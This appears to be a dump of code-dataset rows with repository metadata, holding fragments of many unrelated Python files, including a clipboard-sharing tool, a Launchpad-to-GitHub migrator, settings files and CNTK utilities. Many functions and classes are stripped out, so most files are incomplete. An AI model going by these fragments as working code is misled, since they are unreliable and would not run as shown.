hexsha stringlengths 40 40 | size int64 5 2.06M | ext stringclasses 11 values | lang stringclasses 1 value | max_stars_repo_path stringlengths 3 251 | max_stars_repo_name stringlengths 4 130 | max_stars_repo_head_hexsha stringlengths 40 78 | max_stars_repo_licenses listlengths 1 10 | max_stars_count int64 1 191k ⌀ | max_stars_repo_stars_event_min_datetime stringlengths 24 24 ⌀ | max_stars_repo_stars_event_max_datetime stringlengths 24 24 ⌀ | max_issues_repo_path stringlengths 3 251 | max_issues_repo_name stringlengths 4 130 | max_issues_repo_head_hexsha stringlengths 40 78 | max_issues_repo_licenses listlengths 1 10 | max_issues_count int64 1 116k ⌀ | max_issues_repo_issues_event_min_datetime stringlengths 24 24 ⌀ | max_issues_repo_issues_event_max_datetime stringlengths 24 24 ⌀ | max_forks_repo_path stringlengths 3 251 | max_forks_repo_name stringlengths 4 130 | max_forks_repo_head_hexsha stringlengths 40 78 | max_forks_repo_licenses listlengths 1 10 | max_forks_count int64 1 105k ⌀ | max_forks_repo_forks_event_min_datetime stringlengths 24 24 ⌀ | max_forks_repo_forks_event_max_datetime stringlengths 24 24 ⌀ | content stringlengths 1 1.05M | avg_line_length float64 1 1.02M | max_line_length int64 3 1.04M | alphanum_fraction float64 0 1 |
|---|---|---|---|---|---|---|---|---|---|---|---|---|---|---|---|---|---|---|---|---|---|---|---|---|---|---|---|---|
54a10b062decccd624d8a14f46543d84c61a99d9 | 176 | py | Python | project_e/jobs/apps.py | ElectricFleming/project-e | cf05d2a835a09555e3dba5813d635d329684a71c | [
"bzip2-1.0.6"
] | null | null | null | project_e/jobs/apps.py | ElectricFleming/project-e | cf05d2a835a09555e3dba5813d635d329684a71c | [
"bzip2-1.0.6"
] | 3 | 2020-01-30T03:47:26.000Z | 2021-05-11T00:58:08.000Z | project_e/jobs/apps.py | effortless-electric/project-e | ae4e8415204319999ee2ecac248e2504ec1fff63 | [
"bzip2-1.0.6"
] | 1 | 2019-12-27T22:45:45.000Z | 2019-12-27T22:45:45.000Z | from django.apps import AppConfig
from django.utils.translation import gettext_lazy as _
| 25.142857 | 54 | 0.761364 |
54a29568d20a9d3cd8819302aa5a4f6675a50ec6 | 3,080 | py | Python | Final_plot/request_type(pie).py | ashutoshbhadke/weblog-visualizer | 7fd10535fe0909291da194776b053eca1640b1e9 | [
"MIT"
] | null | null | null | Final_plot/request_type(pie).py | ashutoshbhadke/weblog-visualizer | 7fd10535fe0909291da194776b053eca1640b1e9 | [
"MIT"
] | null | null | null | Final_plot/request_type(pie).py | ashutoshbhadke/weblog-visualizer | 7fd10535fe0909291da194776b053eca1640b1e9 | [
"MIT"
] | null | null | null | import csv
from pylab import *
import matplotlib.pyplot as plt
count1=[]
req_data=[]
if __name__ == '__main__':
main()
| 26.101695 | 91 | 0.500974 |
54a40265eb0edbb4261d2c562a057abf3c76c839 | 5,979 | py | Python | pandas/lib/excelRW.py | philip-shen/note_python | db0ad84af25464a22ac52e348960107c81e74a56 | [
"MIT"
] | null | null | null | pandas/lib/excelRW.py | philip-shen/note_python | db0ad84af25464a22ac52e348960107c81e74a56 | [
"MIT"
] | 11 | 2021-02-08T20:45:23.000Z | 2022-03-12T01:00:11.000Z | pandas/lib/excelRW.py | philip-shen/note_python | db0ad84af25464a22ac52e348960107c81e74a56 | [
"MIT"
] | null | null | null | ## 2018/08/17 Initial
## 2018/08/18 Add CSV format
## 2018/08/23 Add def get_stockidxname_SeymourExcel(),def get_stockidx_SeymourExcel()
## def get_all_stockidx_SeymourExcel() from test_crawl.py
## 2018/09/06 Add value of column 'PBR' in def readExcel()
## 2018/10/27 Add exception handling in def readExcel(self,dir_execlfile)
## 2019/07/20 Add get_all_stockidxname_SeymourExcel, get_stockname_SeymourExcel and get_all_stockname_SeymourExcel
#################################################################
import xlrd
import xlwt
import xlutils.copy
import csv
import os
from logger import logger | 40.398649 | 118 | 0.630373 |
54a4ba9c11d3248dceffbbc60702b2f7f2e73b4a | 3,950 | py | Python | launchpad2github.py | mleinart/launchpad2github | faade979a1f209dc1d25aa82a32f6342dbfe35b3 | [
"MIT"
] | 2 | 2016-10-07T08:55:40.000Z | 2017-08-30T16:43:57.000Z | launchpad2github.py | mleinart/launchpad2github | faade979a1f209dc1d25aa82a32f6342dbfe35b3 | [
"MIT"
] | null | null | null | launchpad2github.py | mleinart/launchpad2github | faade979a1f209dc1d25aa82a32f6342dbfe35b3 | [
"MIT"
] | null | null | null | #!/usr/bin/env python
import os
import sys
import time
from getpass import getpass
from optparse import OptionParser
from termcolor import colored
from launchpadlib.launchpad import Launchpad
from github3 import login as github_login
from github3 import GitHubError
ACTIVE_STATUSES = [
"New",
"Confirmed",
"Triaged",
"In Progress"
]
IMPORTED_FIELDS = [
"owner",
"web_link",
"date_created",
"date_last_updated",
"tags",
]
if __name__ == "__main__":
sys.exit(main(sys.argv[1:]))
| 27.816901 | 100 | 0.679241 |
54a4f81f72eecfec1f015beea32efd5b9edfa7de | 168 | py | Python | Curso-em-video-Python3-mundo1/ex024.py | bernardombraga/Solucoes-exercicios-cursos-gratuitos | 0347a8325443fce84e0a753c96f523a22858537b | [
"MIT"
] | null | null | null | Curso-em-video-Python3-mundo1/ex024.py | bernardombraga/Solucoes-exercicios-cursos-gratuitos | 0347a8325443fce84e0a753c96f523a22858537b | [
"MIT"
] | null | null | null | Curso-em-video-Python3-mundo1/ex024.py | bernardombraga/Solucoes-exercicios-cursos-gratuitos | 0347a8325443fce84e0a753c96f523a22858537b | [
"MIT"
] | null | null | null | entrada = str(input('Em que cidade voc nasceu? '))
cidade = entrada.strip().lower()
partido = cidade.split()
pnome = partido[0]
santo = (pnome == 'santo')
print(santo) | 28 | 51 | 0.684524 |
54a68c80a2f5f81aaa165bc135be5a9f31aa99a1 | 8,754 | py | Python | tests/unit/test_parameters/test_lead_acid_parameters.py | jatin837/PyBaMM | 837421bd5b251647a257c23540ceb2908a225bdb | [
"BSD-3-Clause"
] | 1 | 2021-04-25T09:53:40.000Z | 2021-04-25T09:53:40.000Z | tests/unit/test_parameters/test_lead_acid_parameters.py | jatin837/PyBaMM | 837421bd5b251647a257c23540ceb2908a225bdb | [
"BSD-3-Clause"
] | null | null | null | tests/unit/test_parameters/test_lead_acid_parameters.py | jatin837/PyBaMM | 837421bd5b251647a257c23540ceb2908a225bdb | [
"BSD-3-Clause"
] | null | null | null | #
# Test for the standard lead acid parameters
#
import pybamm
from tests import get_discretisation_for_testing
import unittest
if __name__ == "__main__":
print("Add -v for more debug output")
import sys
if "-v" in sys.argv:
debug = True
pybamm.settings.debug_mode = True
unittest.main()
| 43.77 | 85 | 0.664154 |
54a9266c033c65ceff0e6381eb549dcffd4ece05 | 890 | py | Python | firmware/temphumid/timeset.py | schizobovine/unicorder | 3165922c2662b1bd2c5ab1691c89e2af5ee185e7 | [
"CC-BY-4.0"
] | null | null | null | firmware/temphumid/timeset.py | schizobovine/unicorder | 3165922c2662b1bd2c5ab1691c89e2af5ee185e7 | [
"CC-BY-4.0"
] | null | null | null | firmware/temphumid/timeset.py | schizobovine/unicorder | 3165922c2662b1bd2c5ab1691c89e2af5ee185e7 | [
"CC-BY-4.0"
] | null | null | null | #!/usr/bin/env python
from datetime import datetime
import serial
import sys
import time
SERIAL_BAUD = 9600
SERIAL_PORT = '/dev/ttyUSB0'
TIME_FORMAT = "T%s"
# Reset device to activate time setting routine
DO_RST = True
# Open serial dong
print 'opening serial port %s...' % SERIAL_PORT
uart = serial.Serial(
port=SERIAL_PORT,
baudrate=SERIAL_BAUD,
dsrdtr=DO_RST,
)
# Frobulate the DTR pin to reset the target
if DO_RST:
print 'twiddling DTR to reset'
uart.setRTS(False)
uart.setDTR(False)
uart.flush()
time.sleep(0.2)
uart.flushInput()
uart.setRTS(True)
uart.setDTR(True)
time.sleep(1)
print 'reset done'
# Send start command to begin cycle
time.sleep(1)
for i in xrange(0, 30):
time.sleep(0.1)
now = datetime.now().strftime(TIME_FORMAT)
uart.write(now + "\r\n")
uart.flush()
uart.close()
print 'done!'
sys.exit(0)
| 18.93617 | 47 | 0.683146 |
54a991a385bd9da3a9f26780efab2ed38b49007b | 3,789 | py | Python | setup.py | giampaolo/pysendfile | 2ffdd452b03dd4b639cda985bd67b8d4c0c34a5f | [
"MIT"
] | 119 | 2015-01-06T10:26:35.000Z | 2021-12-03T06:22:47.000Z | setup.py | giampaolo/pysendfile | 2ffdd452b03dd4b639cda985bd67b8d4c0c34a5f | [
"MIT"
] | 11 | 2015-02-06T18:01:26.000Z | 2022-03-14T09:51:28.000Z | setup.py | giampaolo/pysendfile | 2ffdd452b03dd4b639cda985bd67b8d4c0c34a5f | [
"MIT"
] | 24 | 2015-01-13T20:08:46.000Z | 2021-07-30T13:45:15.000Z | #!/usr/bin/env python
# ======================================================================
# This software is distributed under the MIT license reproduced below:
#
# Copyright (C) 2009-2014 Giampaolo Rodola' <g.rodola@gmail.com>
#
# Permission to use, copy, modify, and distribute this software and
# its documentation for any purpose and without fee is hereby
# granted, provided that the above copyright notice appear in all
# copies and that both that copyright notice and this permission
# notice appear in supporting documentation, and that the name of
# Giampaolo Rodola' not be used in advertising or publicity pertaining to
# distribution of the software without specific, written prior
# permission.
#
# Giampaolo Rodola' DISCLAIM ALL WARRANTIES WITH REGARD TO THIS SOFTWARE,
# INCLUDING ALL IMPLIED WARRANTIES OF MERCHANTABILITY AND FITNESS, IN
# NO EVENT Giampaolo Rodola' BE LIABLE FOR ANY SPECIAL, INDIRECT OR
# CONSEQUENTIAL DAMAGES OR ANY DAMAGES WHATSOEVER RESULTING FROM LOSS
# OF USE, DATA OR PROFITS, WHETHER IN AN ACTION OF CONTRACT,
# NEGLIGENCE OR OTHER TORTIOUS ACTION, ARISING OUT OF OR IN
# CONNECTION WITH THE USE OR PERFORMANCE OF THIS SOFTWARE.
# ======================================================================
import sys
try:
from setuptools import Extension, setup
except ImportError:
from distutils.core import Extension, setup
NAME = 'pysendfile'
VERSION = '2.0.1'
if sys.version_info < (2, 5):
sys.exit('python version not supported (< 2.5)')
if 'sunos' in sys.platform:
libraries = ["sendfile"]
else:
libraries = []
if __name__ == '__main__':
main()
| 40.308511 | 73 | 0.5801 |
54a9d8c8660ee37792168966ac376aefeed7599f | 3,248 | py | Python | V1_backup/macro_ssh.py | YuanYuLin/iopcrestapi_client | 5c1683d1b5b44bd8bb641933d9526cee97075d31 | [
"MIT"
] | null | null | null | V1_backup/macro_ssh.py | YuanYuLin/iopcrestapi_client | 5c1683d1b5b44bd8bb641933d9526cee97075d31 | [
"MIT"
] | null | null | null | V1_backup/macro_ssh.py | YuanYuLin/iopcrestapi_client | 5c1683d1b5b44bd8bb641933d9526cee97075d31 | [
"MIT"
] | null | null | null | #!/usr/bin/python2.7
import sys
import time
import pprint
import libiopc_rest as rst
action_list=[
{"NAME":"set_env", "FUNCTION":set_env},
{"NAME":"gen_ssh_key", "FUNCTION":gen_ssh_key},
{"NAME":"start_ssh", "FUNCTION":start_ssh},
{"NAME":"stop_ssh", "FUNCTION":stop_ssh},
]
if __name__ == '__main__':
if len(sys.argv) < 3:
help_usage()
hostname=sys.argv[1]
action=sys.argv[2]
request_list(hostname, 'json', action)
| 29.798165 | 139 | 0.638855 |
54aae49452e8676142b61393e18f197e00851192 | 4,746 | py | Python | PatternConverter.py | Suitceyes-Project-Code/Tactile-Brush-Python | 12da563d0988aa3b41c547ee9e1618f30c8b805c | [
"MIT"
] | null | null | null | PatternConverter.py | Suitceyes-Project-Code/Tactile-Brush-Python | 12da563d0988aa3b41c547ee9e1618f30c8b805c | [
"MIT"
] | null | null | null | PatternConverter.py | Suitceyes-Project-Code/Tactile-Brush-Python | 12da563d0988aa3b41c547ee9e1618f30c8b805c | [
"MIT"
] | 1 | 2021-10-04T14:27:25.000Z | 2021-10-04T14:27:25.000Z | from Stroke import Stroke
from TactileBrush import TactileBrush
import json
from sortedcontainers import SortedList
EPSILON = 0.001
def create_pattern(motion : dict):
pattern = VibrationPattern(duration, False, 0)
for activation_time, steps in motion.items():
# Create starting frame
start_frame = Frame(activation_time)
for step in steps:
# Calculate end time
end_time = max(0, min(activation_time + step.duration, pattern.duration))
point = Point(step.column, step.line)
# Get pin from config
pin = Config.mapping[point]
value = step.intensity
# Add to starting frame
start_frame.actuators.add(ActuatorValue(pin, value))
# Create end frame
end_frame = Frame(end_time)
end_frame.actuators.add(ActuatorValue(pin, 0.0))
# Add frames
pattern.add_frame(start_frame)
pattern.add_frame(end_frame)
return pattern
def get_position_from_string(s : str):
s = s.strip() # remove whitespace
pos_x = 0
pos_y = 0
try:
split = s.split(',')
pos_x = float(split[0])
pos_y = float(split[1])
except Exception as e:
raise Exception("Invalid position was passed. Format must be 'x,y.")
return pos_x, pos_y
def get_duration_from_string(s : str):
s = s.strip()
duration = 0
try:
duration = float(s)
except Exception as e:
raise Exception("Invalid duration was passed. A decimal value must be passed.")
return duration
if __name__ == "__main__":
print("Enter stroke start position (x,y):")
start_str = input()
start_x, start_y = get_position_from_string(start_str)
print("Enter stroke start position (x,y):")
end_str = input()
end_x, end_y = get_position_from_string(end_str)
print("Enter duration of stroke in msec:")
duration_str = input()
duration = get_duration_from_string(duration_str)
t = TactileBrush(Config.lines, Config.columns, Config.spacing)
s = Stroke(start_x, start_y, end_x, end_y, duration, 1)
motion = t.compute_stroke_steps(s)
pattern = create_pattern(motion)
print("Json Pattern:\n")
print(pattern.to_json()) | 29.849057 | 90 | 0.588074 |
54ab3bd5170524abc405764a761515f4dbe3bb71 | 14,921 | py | Python | ConnectedClipboard.py | yamanogluberk/ConnectedClipboard | 93aa04a2075b6ed2b6d50fce39a7c26dd80e8564 | [
"MIT"
] | null | null | null | ConnectedClipboard.py | yamanogluberk/ConnectedClipboard | 93aa04a2075b6ed2b6d50fce39a7c26dd80e8564 | [
"MIT"
] | null | null | null | ConnectedClipboard.py | yamanogluberk/ConnectedClipboard | 93aa04a2075b6ed2b6d50fce39a7c26dd80e8564 | [
"MIT"
] | null | null | null | import select
import socket
import json
import threading
import time
import clipboard
import math
from datetime import datetime
ip = ""
localpart = ""
name = ""
tcp = 5555
udp = 5556
buffer_size = 1024
broadcast_try_count = 3
ping_try_count = 3
members = [] # item - (str) ipaddress
current_room_ip = ""
my_room_name = "" # only room owner has this data
discovered_rooms = set() # item - (roomname, roomip)
REQUESTED_ROOM = ("", "")
CLIPBOARD_DATA = clipboard.paste()
CLIPBOARD_LOCK = threading.Lock()
DATA_LOCK = threading.Lock()
SHARED_TIME_BASE = 0
PRIVATE_TIME_BASE = 0
LATENCY = 0
RECEIVED_PING_COUNTER = 0
LAST_CHANGED_TS = 0
is_main_ui = True
input_active = True
if __name__ == '__main__':
main()
| 27.079855 | 96 | 0.602171 |
54ae8f3aab6c6047677661a66e0ddd7fd0d3d3e9 | 9,728 | py | Python | paddleslim/prune/auto_pruner.py | liuqiaoping7/PaddleSlim | 083003661af893e92cd7bb9017e7d4a3761c7b20 | [
"Apache-2.0"
] | null | null | null | paddleslim/prune/auto_pruner.py | liuqiaoping7/PaddleSlim | 083003661af893e92cd7bb9017e7d4a3761c7b20 | [
"Apache-2.0"
] | null | null | null | paddleslim/prune/auto_pruner.py | liuqiaoping7/PaddleSlim | 083003661af893e92cd7bb9017e7d4a3761c7b20 | [
"Apache-2.0"
] | null | null | null | # Copyright (c) 2019 PaddlePaddle Authors. All Rights Reserved.
#
# Licensed under the Apache License, Version 2.0 (the "License"
# you may not use this file except in compliance with the License.
# You may obtain a copy of the License at
#
# http://www.apache.org/licenses/LICENSE-2.0
#
# Unless required by applicable law or agreed to in writing, software
# distributed under the License is distributed on an "AS IS" BASIS,
# WITHOUT WARRANTIES OR CONDITIONS OF ANY KIND, either express or implied.
# See the License for the specific language governing permissions and
# limitations under the License.
import socket
import logging
import numpy as np
import paddle.fluid as fluid
from .pruner import Pruner
from ..core import VarWrapper, OpWrapper, GraphWrapper
from ..common import SAController
from ..common import get_logger
from ..analysis import flops
from ..common import ControllerServer
from ..common import ControllerClient
__all__ = ["AutoPruner"]
_logger = get_logger(__name__, level=logging.INFO)
| 39.384615 | 106 | 0.628701 |
54afe8421a6919e6ea315d052ac2b1d84c0d0ecd | 387 | py | Python | model-creator.py | LouisRoss/spiking-model-packager | de75a923e7332b73cb7252300af91d4620b6e801 | [
"MIT"
] | null | null | null | model-creator.py | LouisRoss/spiking-model-packager | de75a923e7332b73cb7252300af91d4620b6e801 | [
"MIT"
] | null | null | null | model-creator.py | LouisRoss/spiking-model-packager | de75a923e7332b73cb7252300af91d4620b6e801 | [
"MIT"
] | null | null | null | import sys
import json
from h5model import h5model
if len(sys.argv) < 2:
print('Usage: ' + sys.argv[0] + ' ' + '<model name>')
exit(1)
modelName = sys.argv[1]
model = h5model(modelName)
model.createModel()
if model.responseStatus >= 400:
print("Unable to create model '" + modelName + "': " + model.errorMessage, file = sys.stderr)
exit(1)
print(model.responseSuccessPayload) | 22.764706 | 95 | 0.687339 |
54b1f3e83d93705cfe337ba5f02b4044fdd2e4b8 | 70 | py | Python | decimal to binary.py | Kshitijkrishnadas/haribol | ca45e633baaabaad3bb923f5633340ccf88d996c | [
"bzip2-1.0.6"
] | null | null | null | decimal to binary.py | Kshitijkrishnadas/haribol | ca45e633baaabaad3bb923f5633340ccf88d996c | [
"bzip2-1.0.6"
] | null | null | null | decimal to binary.py | Kshitijkrishnadas/haribol | ca45e633baaabaad3bb923f5633340ccf88d996c | [
"bzip2-1.0.6"
] | null | null | null | a=''
n=int(input())
while n != 0:
a=str(n%2)+a
n//=2
print(a)
| 10 | 16 | 0.457143 |
54b2b1435e7c0cbedc57669a7f3b6443192e3d9f | 4,887 | py | Python | settings/base.py | anthill-gaming/media | cc3292be8bd83aba6054e420124adabcfa4e3a8b | [
"MIT"
] | 1 | 2018-11-30T21:56:14.000Z | 2018-11-30T21:56:14.000Z | settings/base.py | anthill-gaming/media | cc3292be8bd83aba6054e420124adabcfa4e3a8b | [
"MIT"
] | null | null | null | settings/base.py | anthill-gaming/media | cc3292be8bd83aba6054e420124adabcfa4e3a8b | [
"MIT"
] | null | null | null | from anthill.framework.utils.translation import translate_lazy as _
from anthill.platform.conf.settings import *
import os
# Build paths inside the application like this: os.path.join(BASE_DIR, ...)
BASE_DIR = os.path.dirname(os.path.dirname(os.path.abspath(__file__)))
# SECURITY WARNING: keep the secret key used in production secret!
SECRET_KEY = 'nrc_!b1_n4!7cx!4!^&hfu^5axl3_fhki)rbyavnh@mthrk@op'
DEBUG = False
ADMINS = (
('Lysenko Vladimir', 'wofkin@gmail.com'),
)
SQLALCHEMY_DATABASE_URI = 'postgres://anthill_media@/anthill_media'
LOCATION = 'http://localhost:9615'
BROKER = 'amqp://guest:guest@localhost:5672'
# ROUTES_CONF = 'media.routes'
LOCALE_PATH = os.path.join(BASE_DIR, 'locale')
MEDIA_ROOT = os.path.join(BASE_DIR, 'media')
MEDIA_URL = '/media/'
# APPLICATION_CLASS = 'media.apps.AnthillApplication'
APPLICATION_NAME = 'media'
APPLICATION_VERBOSE_NAME = _('Media')
APPLICATION_DESCRIPTION = _('Manage user uploaded files')
APPLICATION_ICON_CLASS = 'icon-file-media'
APPLICATION_COLOR = 'teal'
# SERVICE_CLASS = 'media.services.Service'
CACHES["default"]["LOCATION"] = "redis://localhost:6379/25"
CACHES["default"]["KEY_PREFIX"] = "media.anthill"
EMAIL_SUBJECT_PREFIX = '[Anthill: media] '
LOGGING = {
'version': 1,
'disable_existing_loggers': False,
'filters': {
'require_debug_false': {
'()': 'anthill.framework.utils.log.RequireDebugFalse',
},
'require_debug_true': {
'()': 'anthill.framework.utils.log.RequireDebugTrue',
},
},
'formatters': {
'anthill.server': {
'()': 'anthill.framework.utils.log.ServerFormatter',
'fmt': '%(color)s[%(levelname)1.1s %(asctime)s %(module)s:%(lineno)d]%(end_color)s %(message)s',
'datefmt': '%Y-%m-%d %H:%M:%S',
'color': False,
}
},
'handlers': {
'console': {
'level': 'DEBUG',
'filters': ['require_debug_true'],
'class': 'logging.StreamHandler',
'formatter': 'anthill.server',
},
'anthill.server': {
'level': 'DEBUG',
'class': 'logging.handlers.RotatingFileHandler',
'filename': os.path.join(LOGGING_ROOT_DIR, 'media.log'),
'formatter': 'anthill.server',
'maxBytes': 100 * 1024 * 1024, # 100 MiB
'backupCount': 10
},
'mail_admins': {
'level': 'ERROR',
'filters': ['require_debug_false'],
'class': 'anthill.framework.utils.log.AdminEmailHandler'
}
},
'loggers': {
'anthill': {
'handlers': ['console', 'mail_admins'],
'level': 'INFO',
},
'anthill.application': {
'handlers': ['anthill.server'],
'level': 'INFO',
'propagate': False
},
'tornado.access': {
'handlers': ['anthill.server'],
'level': 'INFO',
'propagate': False
},
'tornado.application': {
'handlers': ['anthill.server'],
'level': 'INFO',
'propagate': False
},
'tornado.general': {
'handlers': ['anthill.server'],
'level': 'INFO',
'propagate': False
},
'celery': {
'handlers': ['anthill.server'],
'level': 'INFO',
'propagate': False
},
'celery.worker': {
'handlers': ['anthill.server'],
'level': 'INFO',
'propagate': False
},
'celery.task': {
'handlers': ['anthill.server'],
'level': 'INFO',
'propagate': False
},
'celery.redirected': {
'handlers': ['anthill.server'],
'level': 'INFO',
'propagate': False
},
'asyncio': {
'handlers': ['anthill.server'],
'level': 'INFO',
'propagate': False
},
}
}
#########
# GEOIP #
#########
GEOIP_PATH = os.path.join(BASE_DIR, '../')
#########
# HTTPS #
#########
# HTTPS = {
# 'key_file': os.path.join(BASE_DIR, '../server.key'),
# 'crt_file': os.path.join(BASE_DIR, '../server.crt'),
# }
HTTPS = None
############
# GRAPHENE #
############
GRAPHENE = {
'SCHEMA': 'media.api.v1.public.schema',
'MIDDLEWARE': ()
}
#############
# THUMBNAIL #
#############
THUMBNAIL_DEFAULT_OPTIONS = {
'resize': 'fill', # 'fill', 'fit', 'stretch'
'upscale': True,
'format': None, # 'JPEG', 'PNG'
'quality': 90,
'progressive': True,
'orientation': True,
'optimize': False,
}
THUMBNAIL_ALIASES = {
'test': {
'geometry': '250x250',
'filters': [('crop', '250x250', 'center', 'center')],
'options': {'optimize': True, 'quality': 90, 'format': 'PNG'}
}
}
THUMBNAIL_DIR = 'thumbs'
| 27 | 108 | 0.529568 |
54b51b30bb070d1462b530e3aafb5daba4e65245 | 2,787 | py | Python | odmltables/gui/wizutils.py | fabianschlebusch/python-odmltables | 90a7833516afe8864b40947f4a1757830a0dc44c | [
"BSD-3-Clause"
] | 6 | 2017-10-27T16:59:53.000Z | 2021-03-02T06:08:48.000Z | odmltables/gui/wizutils.py | fabianschlebusch/python-odmltables | 90a7833516afe8864b40947f4a1757830a0dc44c | [
"BSD-3-Clause"
] | 68 | 2016-01-26T10:48:16.000Z | 2021-11-16T10:09:49.000Z | odmltables/gui/wizutils.py | fabianschlebusch/python-odmltables | 90a7833516afe8864b40947f4a1757830a0dc44c | [
"BSD-3-Clause"
] | 7 | 2015-11-24T12:40:18.000Z | 2021-04-14T08:02:53.000Z | # -*- coding: utf-8 -*-
import os, sys
from PyQt5.QtWidgets import (QWizard, QMessageBox)
from PyQt5.QtGui import QPixmap
from PyQt5.QtCore import pyqtSlot, Qt
try:
import odmltables
have_odmltables = True
except:
have_odmltables = False
from .settings import Settings
| 32.406977 | 86 | 0.588805 |
54b6c94b65480166ee80c689e0b477e97f134499 | 25,440 | py | Python | trainLib.py | dorukb/ceng445-trainSim | 01af1c556dbce4e3f1c07fc16a21cd94cdeb7884 | [
"MIT"
] | null | null | null | trainLib.py | dorukb/ceng445-trainSim | 01af1c556dbce4e3f1c07fc16a21cd94cdeb7884 | [
"MIT"
] | null | null | null | trainLib.py | dorukb/ceng445-trainSim | 01af1c556dbce4e3f1c07fc16a21cd94cdeb7884 | [
"MIT"
] | null | null | null | import math
#constants and globals
background = '0'
NORTH = 0
EAST = 1
SOUTH = 2
WEST = 3
dirs = {0 : "NORTH", 1 : "EAST", 2 : "SOUTH", 3 : "WEST"}
| 39.564541 | 190 | 0.596502 |
54b7f3a8b8887e8d822b83c326d0049cfae95c7f | 25,083 | py | Python | nar_module/nar/preprocessing/nar_preprocess_cafebiz_2.py | 13520505/bigdataproj | 09202c7e13366726415b1111cc93d3083d102cb3 | [
"MIT"
] | null | null | null | nar_module/nar/preprocessing/nar_preprocess_cafebiz_2.py | 13520505/bigdataproj | 09202c7e13366726415b1111cc93d3083d102cb3 | [
"MIT"
] | 9 | 2020-01-28T23:07:43.000Z | 2022-02-10T00:36:23.000Z | nar_module/nar/preprocessing/nar_preprocess_cafebiz_2.py | 13520505/bigdataproj | 09202c7e13366726415b1111cc93d3083d102cb3 | [
"MIT"
] | null | null | null | import argparse
import glob
import json
import os
import os.path
import re
import sys
from collections import Counter, defaultdict
from datetime import datetime
from os import path
import numpy as np
import pandas as pd
import tensorflow as tf
from acr_module.acr.acr_module_service import get_all_file, load_json_config
from nar_module.nar.tf_records_management import (make_sequential_feature,
save_rows_to_tf_record_file)
from nar_module.nar.utils import (deserialize, extract_local_hour_weekday,
gini_index, serialize)
# sys.path.append("/home/tungtv/Documents/Code/News/newsrecomdeepneural")
from pick_singleton.pick_singleton import ACR_Pickle_Singleton
from redis_connector.RedisClient import PageView, RedisClient, Session
sys.path.append("/data/tungtv/Code/NewsRecomDeepLearning")
# from ..tf_records_management import save_rows_to_tf_record_file, make_sequential_feature
# from ..utils import serialize, deserialize, hash_str_to_int, extract_local_hour_weekday, gini_index
numeric_scalers = {
'_elapsed_ms_since_last_click': {
#Set Maximum of 60 min, just to separate returning users, whose elapsed time since last click will be greater than the max 30-min limit for sessions
'valid_max': 60 * 60 * 1000.0,
'avg': 789935.7,
'stddev': 1371436.0},
'active_time_secs': {
'valid_max': 900.0,
'avg': 65.0,
'stddev': 69.37},
'active_time_secs_by_word': {
'valid_max': 10.0,
'avg': 1.854,
'stddev': 1.474},
'text_length':{
'avg':728
}
}
if __name__ == '__main__':
main_nar_preprocess_2()
| 42.950342 | 176 | 0.670653 |
54b976c7100ab785c654b0c7ca7597f8b6235530 | 2,979 | py | Python | tests/integration/test_labels.py | spmistry/crux-python | 15a6b705d1eec7e789f6f62819429f93e02349c1 | [
"MIT"
] | null | null | null | tests/integration/test_labels.py | spmistry/crux-python | 15a6b705d1eec7e789f6f62819429f93e02349c1 | [
"MIT"
] | null | null | null | tests/integration/test_labels.py | spmistry/crux-python | 15a6b705d1eec7e789f6f62819429f93e02349c1 | [
"MIT"
] | null | null | null | import pytest
# Negative Test case which verifies label search by searching unset labels without pagination.
# Negative Test case which verifies label search by searching unset labels with pagination.
| 35.891566 | 94 | 0.700906 |
54b9924021536e75d5d98199ebdf2f58b7c84e9c | 15,384 | py | Python | bindings/python/cntk/utils/__init__.py | MSXC/CNTK | d223d48b411bc994acd465ed333c9f6bed64dd7f | [
"RSA-MD"
] | null | null | null | bindings/python/cntk/utils/__init__.py | MSXC/CNTK | d223d48b411bc994acd465ed333c9f6bed64dd7f | [
"RSA-MD"
] | null | null | null | bindings/python/cntk/utils/__init__.py | MSXC/CNTK | d223d48b411bc994acd465ed333c9f6bed64dd7f | [
"RSA-MD"
] | null | null | null | # Copyright (c) Microsoft. All rights reserved.
# Licensed under the MIT license. See LICENSE.md file in the project root
# for full license information.
# ==============================================================================
import sys
import numbers
import collections
import copy
import numpy as np
from numbers import Number
from scipy import sparse
from .. import cntk_py
from ..device import use_default_device, cpu
from ..axis import Axis
from cntk.internal import typemap
# To __remove__
from cntk.logging import *
# End to remove
_VARIABLE_OR_FUNCTION = (cntk_py.Variable, cntk_py.Function)
# To __remove__
# End to remove
def get_data_type(*args):
"""
Calculates the highest precision numpy data type of the provided parameters.
If the parameter is a Function instance, it calculates it based on its
inputs. Placeholders are ignored in the type determination.
Args:
args (number, list, NumPy array, :class:`~cntk.ops.variables.Variable`, or :class:`~cntk.ops.functions.Function`): input
Returns:
np.float32, np.float64, or None
"""
from ..ops.variables import Variable
cntk_dtypes = set()
numpy_dtypes = set()
if len(args) == 1 and isinstance(args, _VARIABLE_OR_FUNCTION):
args = [args]
for arg in args:
if isinstance(arg, Variable) and arg.is_placeholder == True:
continue
if isinstance(arg,
(cntk_py.Variable, cntk_py.Value, cntk_py.NDArrayView)):
if cntk_py.DataType_Double == arg.get_data_type():
cntk_dtypes.add(np.float64)
elif cntk_py.DataType_Float == arg.get_data_type():
cntk_dtypes.add(np.float32)
elif isinstance(arg, np.ndarray):
if arg.dtype not in (np.float32, np.float64):
raise ValueError(
'NumPy type "%s" is not supported' % arg.dtype)
numpy_dtypes.add(arg.dtype.type)
elif isinstance(arg, _VARIABLE_OR_FUNCTION):
var_outputs = arg.outputs
if len(var_outputs) > 1:
raise ValueError(
'expected single output, but got %i' % len(var_outputs))
var_type = var_outputs[0].get_data_type()
if cntk_py.DataType_Double == var_type:
cntk_dtypes.add(np.float64)
else:
cntk_dtypes.add(np.float32)
else:
# We don't know anything so we convert everything to float32. If it
# works, we know the type.
# TODO figure out a better/faster way.
np.asarray(arg, dtype=np.float32)
numpy_dtypes.add(np.float32)
if cntk_dtypes:
if np.float64 in cntk_dtypes:
return np.float64
elif np.float32 in cntk_dtypes:
return np.float32
else:
if np.float64 in numpy_dtypes:
return np.float64
elif np.float32 in numpy_dtypes:
return np.float32
def _ones_like(batch, precision):
'''
Returns a new batch, which has the same format as ``batch`` but all values
set to 1.
Args:
batch (list of NumPy arrays): a list of sequences, which are NumPy arrays
'''
from cntk.internal import sanitize_precision
return [np.ones_like(sample, dtype=sanitize_precision(precision)) for sample in batch]
def get_train_loss(trainer):
'''
Fetch the train loss from the last minibatch and copy it to the CPU in case it is on the GPU.
Args:
trainer (:class:`~cntk.train.trainer.Trainer`): the trainer used.
Returns:
the loss value
'''
# we copy the value so swig does not destroy it when we leave the scope
